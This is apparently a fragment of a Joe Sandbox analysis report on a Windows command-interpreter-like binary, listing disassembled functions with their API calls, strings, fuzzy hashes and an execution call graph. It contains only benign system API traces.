                                                                                                  • Instruction Fuzzy Hash: 4C61E361B0924282FA14AB21D4681B9E6A1FF44796FF44978D91D07EE1EEBCF844C330
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823DCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDA6
                                                                                                    • Part of subcall function 00007FF7823DCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DB9A1,?,?,?,?,00007FF7823DD81A), ref: 00007FF7823DCDBD
                                                                                                  • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7823F827A), ref: 00007FF7824011DC
                                                                                                  • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7823F827A), ref: 00007FF782401277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                  • String ID: &()[]{}^=;!%'+,`~
                                                                                                  • API String ID: 1135967885-381716982
                                                                                                  • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                  • Instruction ID: 8825ff5bb31d589bfe74f9af828ef124a8d3331e13034289abf16925f158b273
                                                                                                  • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                  • Instruction Fuzzy Hash: 4C71BC71A08242C5EBA0EF15A440679F6E4FB98795FB04235D94E87B94DFBCAC85CB30
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memmovewcsncmp
                                                                                                  • String ID: 0123456789
                                                                                                  • API String ID: 3879766669-2793719750
                                                                                                  • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                  • Instruction ID: 22f317efe0e545df01e79c0e05f7de7acf880b2b291cb12a8018a9b3e9e5e0cd
                                                                                                  • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                  • Instruction Fuzzy Hash: DE411922F1878681EAA5AF26D4006BAB394FB54BD1FA46131CE4E43785DFBCD885C760
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F97D0
                                                                                                    • Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
                                                                                                    • Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
                                                                                                    • Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C
                                                                                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F98D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                  • String ID: Software\Classes
                                                                                                  • API String ID: 2714550308-1656466771
                                                                                                  • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                  • Instruction ID: 9cbb85585f40519163b0444a0941b5d3509c249f7fa24e79b5e04da4bbecdc79
                                                                                                  • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                  • Instruction Fuzzy Hash: 7241D722B0975281EE40FB16E46403DA3A4FB84BD1FA08179DE5E47BE1DFB9D896C350
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FA0FC
                                                                                                    • Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
                                                                                                    • Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
                                                                                                    • Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
                                                                                                    • Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C
                                                                                                  • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823FA1FB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                  • String ID: Software\Classes
                                                                                                  • API String ID: 2714550308-1656466771
                                                                                                  • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                  • Instruction ID: 07df0fb4a4c1b72678c0b32f2e7acf55192c8969ba05d5623c2085676dcf12bc
                                                                                                  • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                  • Instruction Fuzzy Hash: 3241D422B1975281EE00FB15E464439A3A4FB447D1FA18179DE5E47BE0DEBDE882C310
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleTitle
                                                                                                  • String ID: -
                                                                                                  • API String ID: 3358957663-3695764949
                                                                                                  • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                  • Instruction ID: 420f593cf19e6fe494df6a59856c979bef7a47befc2c40c276a195e453b000f4
                                                                                                  • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                  • Instruction Fuzzy Hash: E431AF25A0874295EA04BB11A824078EAA4BB49BD2FB44579CD0E07FD5DFBCE844C324
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmpswscanf
                                                                                                  • String ID: :EOF
                                                                                                  • API String ID: 1534968528-551370653
                                                                                                  • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                  • Instruction ID: 8e22c11f340b87cb175122f52780b5b29f77eac68412420ae4410a4150b0b4c8
                                                                                                  • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                  • Instruction Fuzzy Hash: 72318335E18642A6FB54BB15E4602B8F2A0FF44742FE44075DA4D07E95DFACE845C770
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnicmp
                                                                                                  • String ID: /-Y
                                                                                                  • API String ID: 1886669725-4274875248
                                                                                                  • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                  • Instruction ID: 18477bbde160ddcd8c627ee1f678d1d662a39ffca535e3de15e589d01ce1668e
                                                                                                  • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                  • Instruction Fuzzy Hash: 21219766E0875581FA10AB12A554278FAA0BB44FC2FA44475DE8D07B94DFBCECC2D720
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3$3
                                                                                                  • API String ID: 0-2538865259
                                                                                                  • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                  • Instruction ID: 769bb2de8fbe85faf4e4b78f04405431fb755920c3840a048c812323e4b0cfd7
                                                                                                  • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                  • Instruction Fuzzy Hash: 91016DB5E1E1829AF3147B60D8982B4F661BF44353FF40179C40E069E1CFEC6888C671
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617791916-0
                                                                                                  • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                  • Instruction ID: fe8f1ba7854b03f2b48be724ffc2b5b177d4b45605605a7c44b65eee9de31487
                                                                                                  • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                  • Instruction Fuzzy Hash: 6B417C76A0974296EA14AF10E450179FBE0FF85B82FE48038CA5D07B54DFBCE849C760

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:5.7%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:663
                                                                                                  Total number of Limit Nodes:27
                                                                                                  execution_graph 16818 7ff7823e4163 16819 7ff7823e412e 16818->16819 16822 7ff7823e8f80 16819->16822 16823 7ff7823e8f89 16822->16823 16824 7ff7823e413e 16823->16824 16825 7ff7823e8fe0 RtlCaptureContext RtlLookupFunctionEntry 16823->16825 16826 7ff7823e9025 RtlVirtualUnwind 16825->16826 16827 7ff7823e9067 16825->16827 16826->16827 16830 7ff7823e8fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16827->16830 16765 7ff7823e8d80 16766 7ff7823e8da4 16765->16766 16767 7ff7823e8db6 16766->16767 16768 7ff7823e8dbf Sleep 16766->16768 16769 7ff7823e8ddb _amsg_exit 16767->16769 16774 7ff7823e8de7 16767->16774 16768->16766 16769->16774 16770 7ff7823e8e56 _initterm 16771 7ff7823e8e73 _IsNonwritableInCurrentImage 16770->16771 16779 7ff7823e37d8 GetCurrentThreadId OpenThread 16771->16779 16774->16770 16774->16771 16778 7ff7823e8e3c 16774->16778 16812 7ff7823e04f4 16779->16812 16781 7ff7823e3839 HeapSetInformation RegOpenKeyExW 16782 7ff7823e388d 16781->16782 16783 7ff7823ee9f8 RegQueryValueExW RegCloseKey 16781->16783 16784 7ff7823e5920 VirtualQuery VirtualQuery 16782->16784 16786 7ff7823eea41 GetThreadLocale 16783->16786 16785 7ff7823e38ab GetConsoleOutputCP GetCPInfo 16784->16785 16785->16786 16787 7ff7823e38f1 memset 16785->16787 16802 7ff7823e3919 16786->16802 16787->16802 16788 7ff7823e4d5c 391 API calls 16788->16802 16789 7ff7823d3240 166 API calls 16789->16802 16790 7ff7823e3948 _setjmp 16790->16802 16791 7ff7823eeb27 _setjmp 16791->16802 16792 7ff7823f8530 370 API calls 16792->16802 16793 7ff7823e01b8 6 API calls 16793->16802 16794 7ff7823ddf60 481 API calls 16794->16802 16795 7ff7823eeb71 _setmode 16795->16802 16796 7ff7823e0580 12 API calls 16798 7ff7823e398b GetConsoleOutputCP GetCPInfo 16796->16798 16797 7ff7823e86f0 182 API calls 16797->16802 16801 7ff7823e04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16798->16801 16799 7ff7823e4c1c 166 API calls 16799->16802 16800 7ff7823e58e4 EnterCriticalSection LeaveCriticalSection 16800->16802 16801->16802 16802->16783 16802->16788 16802->16789 16802->16790 16802->16791 16802->16792 16802->16793 16802->16794 16802->16795 16802->16796 16802->16797 16802->16799 16802->16800 16803 7ff7823dbe00 647 API calls 16802->16803 16804 7ff7823e58e4 EnterCriticalSection LeaveCriticalSection 16802->16804 16803->16802 16805 7ff7823eebbe GetConsoleOutputCP GetCPInfo 16804->16805 16806 7ff7823e04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16805->16806 16807 7ff7823eebe6 16806->16807 16808 7ff7823dbe00 647 API calls 16807->16808 16809 7ff7823e0580 12 API calls 16807->16809 16808->16807 16810 7ff7823eebfc GetConsoleOutputCP GetCPInfo 16809->16810 16811 7ff7823e04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16810->16811 16811->16802 16813 7ff7823e0504 16812->16813 16814 7ff7823e051e GetModuleHandleW 16813->16814 16815 7ff7823e054d GetProcAddress 16813->16815 16816 7ff7823e056c SetThreadLocale 16813->16816 16814->16813 16815->16813 21899 7ff7823d6be0 21900 7ff7823dcd90 166 API calls 21899->21900 21901 7ff7823d6c04 21900->21901 21902 7ff7823d6c13 _pipe 21901->21902 21903 7ff7823f41a2 21901->21903 21906 7ff7823d6c32 21902->21906 21936 7ff7823d6e26 21902->21936 21905 7ff7823d3278 166 API calls 21903->21905 21904 7ff7823d3278 166 API calls 21904->21903 21907 7ff7823f41bc 21905->21907 21909 7ff7823d6df1 21906->21909 21950 7ff7823daffc _dup 21906->21950 21908 7ff7823fe91c 198 API calls 21907->21908 21910 7ff7823f41c1 21908->21910 21913 7ff7823d3278 166 API calls 21910->21913 21912 7ff7823d6c7d 21912->21903 21916 7ff7823db038 _dup2 21912->21916 21914 7ff7823f41d2 21913->21914 21915 7ff7823fe91c 198 API calls 21914->21915 21917 7ff7823f41d7 21915->21917 21918 7ff7823d6c93 21916->21918 21919 7ff7823d3278 166 API calls 21917->21919 21918->21917 21920 7ff7823dd208 _close 21918->21920 21921 7ff7823f41e4 21919->21921 21923 7ff7823d6ca4 21920->21923 21922 7ff7823fe91c 198 API calls 21921->21922 21925 7ff7823f41e9 21922->21925 21952 7ff7823dbe00 21923->21952 21927 7ff7823d6ccf _get_osfhandle DuplicateHandle 21928 7ff7823d6d07 21927->21928 21929 7ff7823db038 _dup2 21928->21929 21930 7ff7823d6d11 21929->21930 21930->21917 21931 7ff7823dd208 _close 21930->21931 21932 7ff7823d6d22 21931->21932 21933 7ff7823d6e21 21932->21933 21935 7ff7823daffc _dup 21932->21935 21934 7ff7823fe91c 198 API calls 21933->21934 21934->21936 21937 7ff7823d6d57 21935->21937 21936->21904 21937->21910 21938 7ff7823db038 _dup2 21937->21938 21939 7ff7823d6d6c 21938->21939 21939->21917 21940 7ff7823dd208 _close 21939->21940 21941 7ff7823d6d7c 21940->21941 21942 7ff7823dbe00 647 API calls 21941->21942 21943 7ff7823d6d9c 21942->21943 21944 7ff7823db038 _dup2 21943->21944 21945 7ff7823d6da8 21944->21945 21945->21917 21946 7ff7823dd208 _close 21945->21946 21947 7ff7823d6db9 21946->21947 21947->21933 21948 7ff7823d6dc1 21947->21948 21948->21909 21986 7ff7823d6e60 21948->21986 21951 7ff7823db018 21950->21951 21951->21912 21953 7ff7823d6cc4 21952->21953 21954 7ff7823dbe1b 21952->21954 21953->21927 21953->21928 21954->21953 21955 7ff7823dbe67 21954->21955 21956 7ff7823dbe47 memset 21954->21956 21958 7ff7823dbe73 21955->21958 21960 7ff7823dbf29 21955->21960 21962 7ff7823dbeaf 21955->21962 22062 7ff7823dbff0 21956->22062 21959 7ff7823dbe92 21958->21959 21964 7ff7823dbf0c 21958->21964 21970 7ff7823dbea1 21959->21970 21990 7ff7823dc620 GetConsoleTitleW 21959->21990 21961 7ff7823dcd90 166 API calls 21960->21961 21963 7ff7823dbf33 21961->21963 21962->21953 21967 7ff7823dbff0 185 API calls 21962->21967 21963->21962 21968 7ff7823dbf70 21963->21968 21972 7ff7823d88a8 _wcsicmp 21963->21972 22100 7ff7823db0d8 memset 21964->22100 21967->21953 21980 7ff7823dbf75 21968->21980 22160 7ff7823d71ec 21968->22160 21970->21962 21976 7ff7823daf98 2 API calls 21970->21976 21975 7ff7823dbf5a 21972->21975 21973 7ff7823dbf1e 21973->21962 21974 7ff7823dbfa9 21974->21962 21977 7ff7823dcd90 166 API calls 21974->21977 21975->21968 21978 7ff7823e0a6c 273 API calls 21975->21978 21976->21962 21979 7ff7823dbfbb 21977->21979 21978->21968 21979->21962 21981 7ff7823e081c 166 API calls 21979->21981 21982 7ff7823db0d8 194 API calls 21980->21982 21981->21980 21983 7ff7823dbf7f 21982->21983 21983->21962 22033 7ff7823e5ad8 21983->22033 21987 7ff7823d6e6d 21986->21987 21988 7ff7823d6eb9 21987->21988 21989 7ff7823e5cb4 7 API calls 21987->21989 21988->21909 21989->21987 21991 7ff7823dca2f 21990->21991 21993 7ff7823dc675 21990->21993 21992 7ff7823ec5fc GetLastError 21991->21992 21995 7ff7823d3278 166 API calls 21991->21995 21996 7ff7823e855c ??_V@YAXPEAX 21991->21996 21992->21991 21994 7ff7823dca40 17 API calls 21993->21994 22002 7ff7823dc69b 21994->22002 21995->21991 21996->21991 21997 7ff7823dc9b5 22000 7ff7823e855c ??_V@YAXPEAX 21997->22000 21998 7ff7823d89c0 23 API calls 22003 7ff7823dc762 21998->22003 21999 7ff7823e855c ??_V@YAXPEAX 21999->22003 22023 7ff7823dc855 22000->22023 22001 7ff7823dc978 towupper 22001->22003 22002->21991 22002->21997 22002->22003 22004 7ff7823dd3f0 223 API calls 22002->22004 22003->21991 22003->21992 22003->21997 22003->21998 22003->21999 22003->22001 22005 7ff7823ec60e 22003->22005 22016 7ff7823dc83d 22003->22016 22019 7ff7823dc78a wcschr 22003->22019 22021 7ff7823dca25 22003->22021 22022 7ff7823e291c 8 API calls 22003->22022 22026 7ff7823ec684 22003->22026 22028 7ff7823dca2a 22003->22028 22030 7ff7823dca16 GetLastError 22003->22030 22008 7ff7823dc741 22004->22008 22007 7ff7823fec14 173 API calls 22005->22007 22006 7ff7823dc872 22010 7ff7823e855c ??_V@YAXPEAX 22006->22010 22007->22003 22009 7ff7823dc74d 22008->22009 22013 7ff7823dc8b5 wcsncmp 22008->22013 22009->22003 22014 7ff7823dbd38 207 API calls 22009->22014 22012 7ff7823dc87c 22010->22012 22011 7ff7823ec6b8 SetConsoleTitleW 22011->22006 22015 7ff7823e8f80 7 API calls 22012->22015 22013->22003 22013->22009 22014->22003 22017 7ff7823dc88e 22015->22017 22166 7ff7823dcb40 22016->22166 22017->21970 22019->22003 22025 7ff7823d3278 166 API calls 22021->22025 22022->22003 22023->22006 22023->22011 22025->21991 22027 7ff7823d3278 166 API calls 22026->22027 22027->21991 22029 7ff7823e9158 7 API calls 22028->22029 22029->21991 22032 7ff7823d3278 166 API calls 22030->22032 22032->21991 22034 7ff7823dcd90 166 API calls 22033->22034 22035 7ff7823e5b12 22034->22035 22036 7ff7823dcb40 166 API calls 22035->22036 22061 7ff7823e5b8b 22035->22061 22038 7ff7823e5b26 22036->22038 22037 7ff7823e8f80 7 API calls 22039 7ff7823dbf99 22037->22039 22040 7ff7823e0a6c 273 API calls 22038->22040 22038->22061 22039->21970 22041 7ff7823e5b43 22040->22041 22042 7ff7823e5bb8 22041->22042 22043 7ff7823e5b48 GetConsoleTitleW 22041->22043 22044 7ff7823e5bf4 22042->22044 22045 7ff7823e5bbd GetConsoleTitleW 22042->22045 22046 7ff7823dcad4 172 API calls 22043->22046 22047 7ff7823ef452 22044->22047 22048 7ff7823e5bfd 22044->22048 22050 7ff7823dcad4 172 API calls 22045->22050 22049 7ff7823e5b66 22046->22049 22052 7ff7823e3c24 166 API calls 22047->22052 22054 7ff7823ef462 22048->22054 22055 7ff7823e5c1b 22048->22055 22048->22061 22182 7ff7823e4224 InitializeProcThreadAttributeList 22049->22182 22053 7ff7823e5bdb 22050->22053 22052->22061 22242 7ff7823d96e8 22053->22242 22059 7ff7823d3278 166 API calls 22054->22059 22058 7ff7823d3278 166 API calls 22055->22058 22056 7ff7823e5b7f 22060 7ff7823e5c3c SetConsoleTitleW 22056->22060 22058->22061 22059->22061 22060->22061 22061->22037 22063 7ff7823dc01c 22062->22063 22064 7ff7823dc0c4 22062->22064 22065 7ff7823dc086 22063->22065 22066 7ff7823dc022 22063->22066 